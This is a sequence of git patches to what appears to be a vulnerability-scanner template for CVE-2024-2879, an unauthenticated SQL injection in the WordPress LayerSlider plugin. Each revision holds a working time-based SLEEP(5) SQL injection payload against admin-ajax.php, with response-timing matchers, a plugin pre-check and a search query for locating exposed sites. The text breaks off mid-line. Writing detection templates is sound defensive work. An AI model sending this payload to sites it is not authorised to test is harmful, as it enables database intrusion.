From e0ed53f48b5182f5a35313d307b5b075761d8794 Mon Sep 17 00:00:00 2001 From: Daly Whyte Date: Fri, 5 Apr 2024 12:06:40 +0100 Subject: [PATCH 1/8] Create CVE-2024-2879.yaml Added template for CVE-2024-2789 --- http/cves/2024/CVE-2024-2879.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-2879.yaml diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml new file mode 100644 index 0000000000..1dbc8dacab --- /dev/null +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-2879 +info: + name: WordPress Plugin LayerSlider 7.9.11 – 7.10.0 – Unauthenticated SQL Injection (CVE-2024-2879) + author: Security Blue Team + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-2879 + - https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider + - https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-2879 + cwe-id: CWE-89 + tags: wordpress,layerslider,sqli,CVE-2024-2879 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)' + + matchers: + - type: dsl + dsl: + - 'duration>= 5' + - type: status + status: + - 200 From 72edb06c1ccca87168de91ac66150203e72f9e1b Mon Sep 17 00:00:00 2001 From: d4ly <53091736+d4lyw@users.noreply.github.com> Date: Fri, 5 Apr 2024 12:46:52 +0100 Subject: [PATCH 2/8] Update CVE-2024-2879.yaml Fixed lint. --- http/cves/2024/CVE-2024-2879.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 1dbc8dacab..65f71e1df7 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -22,7 +22,5 @@ requests: matchers: - type: dsl dsl: - - 'duration>= 5' - - type: status - status: - - 200 + - 'duration>= 5' + From 9b663bd06c7acb7cf26486e724238119a1918a64 Mon Sep 17 00:00:00 2001 From: d4ly <53091736+d4lyw@users.noreply.github.com> Date: Fri, 5 Apr 2024 12:51:46 +0100 Subject: [PATCH 3/8] Update CVE-2024-2879.yaml Accidentally removed status check. --- http/cves/2024/CVE-2024-2879.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 65f71e1df7..aa54110593 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -23,4 +23,6 @@ requests: - type: dsl dsl: - 'duration>= 5' - + - type: status + status: + - 200 From 2835ad4955dad90bcda11a3f41b729331a49d3a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Apr 2024 17:45:57 +0530 Subject: [PATCH 4/8] minor update --- http/cves/2024/CVE-2024-2879.yaml | 29 +++++++++++++++++++++-------- 1 file changed, 21 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index aa54110593..44d6fff424 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -1,20 +1,33 @@ id: CVE-2024-2879 + info: - name: WordPress Plugin LayerSlider 7.9.11 – 7.10.0 – Unauthenticated SQL Injection (CVE-2024-2879) - author: Security Blue Team + name: WordPress Plugin LayerSlider 7.9.11-7.10.0 – Unauthenticated SQL Injection + author: d4lyw severity: critical + description: | + The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append + additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 7.10.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-2879 - https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider - https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/ + - https://layerslider.com/release-log/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2879 cwe-id: CWE-89 - tags: wordpress,layerslider,sqli,CVE-2024-2879 + epss-score: 0.00043 + epss-percentile: 0.07687 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/LayerSlider/" + tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)' @@ -22,7 +35,7 @@ requests: matchers: - type: dsl dsl: - - 'duration>= 5' - - type: status - status: - - 200 + - duration>=5 + - status_code == 200 + - contains(body, "") + condition: and From 76db6c72d8d48e723456f6b0ac9c189971a65e95 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Apr 2024 17:48:25 +0530 Subject: [PATCH 5/8] more capatible version --- http/cves/2024/CVE-2024-2879.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 44d6fff424..8fac8076a8 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -28,9 +28,11 @@ info: tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli http: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)' + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x) HTTP/1.1' + Host: {{Hostname}} matchers: - type: dsl From f0a62df007e994d7997b14edbd8961c2abdb8a1c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Apr 2024 17:51:17 +0530 Subject: [PATCH 6/8] fix trailspace --- http/cves/2024/CVE-2024-2879.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 8fac8076a8..b18e7dabdf 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -5,8 +5,7 @@ info: author: d4lyw severity: critical description: | - The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append - additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 7.10.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-2879 From 013dfff19e53b5a3cf10c5fdd978dd9a062c70c0 Mon Sep 17 00:00:00 2001 From: d4ly <53091736+d4lyw@users.noreply.github.com> Date: Fri, 5 Apr 2024 16:11:53 +0100 Subject: [PATCH 7/8] Update CVE-2024-2879.yaml Re-wrote with flow and additional pre-check on http(1), unfortunately no simple README.txt, at least in my environment. --- http/cves/2024/CVE-2024-2879.yaml | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index b18e7dabdf..64b7c5be47 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -2,7 +2,7 @@ id: CVE-2024-2879 info: name: WordPress Plugin LayerSlider 7.9.11-7.10.0 – Unauthenticated SQL Injection - author: d4lyw + author: d4ly severity: critical description: | The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. @@ -26,17 +26,24 @@ info: publicwww-query: "/wp-content/plugins/LayerSlider/" tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli -http: - - raw: - - | - @timeout: 10s - GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x) HTTP/1.1' - Host: {{Hostname}} +flow: http(1) && http(2) +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css" + matchers: + - type: word + words: + - ".ls-clearfix:before" + internal: true + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)" matchers: - type: dsl dsl: - duration>=5 - status_code == 200 - - contains(body, "") + - contains(body, "